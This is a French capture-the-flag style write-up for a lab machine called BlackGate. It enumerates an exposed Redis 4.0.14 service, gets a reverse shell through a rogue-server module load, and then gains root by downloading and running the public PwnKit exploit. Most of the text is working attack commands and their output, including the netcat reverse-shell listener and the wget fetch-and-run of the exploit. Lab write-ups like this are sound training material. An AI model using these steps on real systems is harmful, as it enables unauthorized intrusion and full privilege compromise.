# BlackGate

`redis` `pwnkit`

* Nom machine : BlackGate
* Difficulté : Hard
* OS : Linux

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 06:24 EDT
Nmap scan report for 192.168.242.176
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 37:21:14:3e:23:e5:13:40:20:05:f9:79:e0:82:0b:09 (RSA)
|   256 b9:8d:bd:90:55:7c:84:cc:a0:7f:a8:b4:d3:55:06:a7 (ECDSA)
|_  256 07:07:29:7a:4c:7c:f2:b0:1f:3c:3f:2b:a1:56:9e:0a (ED25519)
6379/tcp open  redis   Redis key-value store 4.0.14
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Local exploitation

{% embed url="<https://github.com/n0b0dyCN/redis-rogue-server/tree/master>" %}

```
┌──(kali㉿kali)-[~/redis]
└─$ python redis.py --rhost 192.168.242.176 --lhost 192.168.45.224
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 192.168.242.176:6379
[info] SERVER 192.168.45.224:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 192.168.45.224
Reverse server port: 1234
[info] Reverse shell payload sent.
[info] Check at 192.168.45.224:1234
[info] Unload module...
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234                    
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.242.176] 49992
whoami
prudence
python3 -c 'import pty;pty.spawn("/bin/bash")'
prudence@blackgate:/tmp$ 
```

## Escalade de privilège

```
prudence@blackgate:/home/prudence$ sudo -l
sudo -l
Matching Defaults entries for prudence on blackgate:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User prudence may run the following commands on blackgate:
    (root) NOPASSWD: /usr/local/bin/redis-status
```

Nous n'avons pas trouvé comment l'exploiter.

Nous avons cherché du côté du kernel et pwnkit fonctionne :

```
┌──(kali㉿kali)-[~/pwnkit]
└─$ curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
```

```
prudence@blackgate:/tmp$ wget http://192.168.45.224/pwnkit/PwnKit
wget http://192.168.45.224/pwnkit/PwnKit
--2024-08-28 11:11:16--  http://192.168.45.224/pwnkit/PwnKit
Connecting to 192.168.45.224:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18040 (18K) [application/octet-stream]
Saving to: ‘PwnKit’

PwnKit                0%[                    ]       0  --.-KB/s     PwnKit              100%[===================>]  17.62K  --.-KB/s    in 0.04s   

2024-08-28 11:11:16 (406 KB/s) - ‘PwnKit’ saved [18040/18040]

prudence@blackgate:/tmp$ chmod +x PwnKit
chmod +x PwnKit
prudence@blackgate:/tmp$ ./PwnKit
./PwnKit
root@blackgate:/tmp# whoami
whoami
root
```